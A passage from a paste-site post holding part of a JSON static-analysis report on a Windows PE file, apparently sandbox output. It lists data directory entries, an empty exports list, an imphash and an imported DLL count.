- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0000a000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x000000e8"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "7e4334085562a74ad98ab8806ba673ef",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 6,
- "versioninfo": []
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement